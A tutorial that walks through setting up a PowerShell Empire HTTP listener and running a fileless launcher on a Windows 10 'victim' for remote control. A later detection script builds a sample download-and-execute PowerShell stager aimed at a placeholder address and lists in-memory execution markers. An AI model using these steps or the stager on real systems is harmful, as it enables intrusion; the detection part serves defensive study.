Even though the fileless malware scene isn’t new, it has only recently received the attention it deserves. With antivirus solutions adopting artificial intelligence and techniques like dynamic analysis, it has become harder and harder for malware developers to keep their payloads undetected. Eventually, any sort of malicious file gets detected. But what if the malicious payload has no file? That’s what PowerShell Empire is here for.
In this article we will introduce you to a rising form of attacks by teaching you how to load malicious code into memory via PowerShell Empire. But first of all, we need to know what PowerShell is: PowerShell is a powerful scripting language by Microsoft that was initially a tool for Windows system administrators to maintain their systems with ease in an automated manner. Later, PowerShell became the Bash of the Windows operating systems family.
Over time, people noticed that PowerShell can be used as well as a malware delivery vector and a post-exploitation vector. Hence tools like Nishang and PowerShell Empire were born.
Enough theory though, let’s get into practice. For this article we will be using the aforementioned PowerShell Empire on a Kali Linux machine (it should be pre-installed by default) and a Windows 10 target machine, which we will infect. You can get Kali Linux here. If PowerShell Empire is not installed by default, run this command in the terminal:
sudo apt update && sudo apt-get install powershell-empire
After acquiring everything we need, let’s run the PowerShell Empire:
After some loading, you will be greeted by something like this:
This might remind you of the Metasploit Framework main screen. Actually, you will find that PowerShell Empire is really similar to the Metasploit Console.
As we can see, 298 modules are loaded, and there are no agents (clients) or listeners active. Let’s first fire up a listener. You can find available listeners by typing ‘uselistener ‘ (mind the space) and then hitting the tab twice:
The job PowerShell Empire has done on autocomplete is wonderful. Here we can see that one of the listeners is ‘http’, which is the one we are going to use. Type ‘uselistener http’ and the listener will get loaded. Now we need to see the configurable options for the listener. Luckily, just like in Metasploit, you can see the options by simply typing ‘info’:
Fortunately, as we see, we won’t have to bother much with the settings. Even our local area network IP address is set automatically. All we have to do is set the port where the listener will run and start the listener. To do so, do the following:
set Port 4444
As you can see, we are telling the PowerShell Empire to listen on port 4444. Now we will have to generate our fileless malware. To do so, all we have to do is write the following command:
That’s it! We have a fileless malware launcher generated.
Execute the generated payload in Windows command prompt, and you will see an agent pop up:
That’s it! We have full control over the target machine!
We can do a quick ‘sysinfo’ to see what our victim is.
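The launcher Empire generates is a single PowerShell command line that carries its script as a base64-encoded argument and runs it in memory, which is exactly what a defender should be watching process-creation logs for. The script below is an added detection example, not code from the article or from the Empire project: it takes a few constructed "user|image|command line" records (the encoded script, the 192.0.2.10 TEST-NET address and the user names are all made up for the example), decodes any -EncodedCommand argument, and flags command lines that combine a hidden window, no profile, an encoded script and in-memory download-and-execute markers. The indicator names, the two-indicator alert threshold and the record layout are my assumptions, not a standard.

```python
import base64
import re

# Constructed sample process-creation records (not from the original article):
# "user|image|command line". The third record simulates an Empire-style
# launcher: hidden window, no profile, and a base64-encoded UTF-16LE script
# that fetches and runs code from memory. The address is a TEST-NET placeholder.
_DECODED_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10:4444/')"
_ENCODED_STAGER = base64.b64encode(_DECODED_STAGER.encode("utf-16le")).decode("ascii")

SAMPLE_LOGS = [
    "alice|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -File C:\\scripts\\backup.ps1",
    "svc-build|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell.exe -ExecutionPolicy Bypass -Command Get-Process",
    f"bob|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|powershell -noP -sta -w 1 -enc {_ENCODED_STAGER}",
    "alice|C:\\Windows\\System32\\cmd.exe|cmd.exe /c dir",
]

# PowerShell accepts any unambiguous prefix of a parameter name, so the
# patterns cover the short forms (-e, -ec, -enc, -w, -nop) as well as the long ones.
ENCODED_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:in|indowstyle)?\s+(?:1|hidden)\b", re.IGNORECASE)
NO_PROFILE = re.compile(r"-no(?:p|profile)\b", re.IGNORECASE)
# Substrings (lower-cased) that suggest the decoded script downloads and runs
# code without touching disk. Substring matching is deliberately loose; tune
# it against your own logs ("iex" will also hit e.g. "iexplore").
IN_MEMORY_MARKERS = ("iex", "invoke-expression", "downloadstring", "net.webclient", "frombase64string")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent or undecodable."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64-encoding it.
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def powershell_indicators(cmdline):
    """Collect launcher indicators for one command line (non-PowerShell => empty list)."""
    indicators = []
    if "powershell" not in cmdline.lower():
        return indicators
    if HIDDEN_WINDOW.search(cmdline):
        indicators.append("hidden_window")
    if NO_PROFILE.search(cmdline):
        indicators.append("no_profile")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        indicators.append("encoded_command")
        text = decoded.lower()
        if any(marker in text for marker in IN_MEMORY_MARKERS):
            indicators.append("in_memory_download_exec")
    return indicators


def scan_logs(lines, threshold=2):
    """Return (user, indicators, decoded_script) for records with >= threshold indicators."""
    hits = []
    for line in lines:
        user, _image, cmdline = line.split("|", 2)
        indicators = powershell_indicators(cmdline)
        if len(indicators) >= threshold:
            hits.append((user, indicators, decode_encoded_command(cmdline)))
    return hits


if __name__ == "__main__":
    for user, indicators, decoded in scan_logs(SAMPLE_LOGS):
        print(f"ALERT user={user} indicators={indicators}")
        print(f"  decoded script: {decoded}")
```

Decoding the argument rather than matching on the raw base64 is the important design choice: the encoded blob changes with every listener address and port, while the decoded script keeps the same download-and-execute shape. The records here are simulated; in practice feed it the command-line field from Sysmon event 1 or Windows security event 4688, and remember that neither is available unless command-line auditing is enabled on the host.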
That concludes our fileless malware adventures. If you found that useful, please leave a comment or consider sharing this post. Also, make sure to check out Privilege Escalation with PowerShell Empire! Good luck and happy hacking!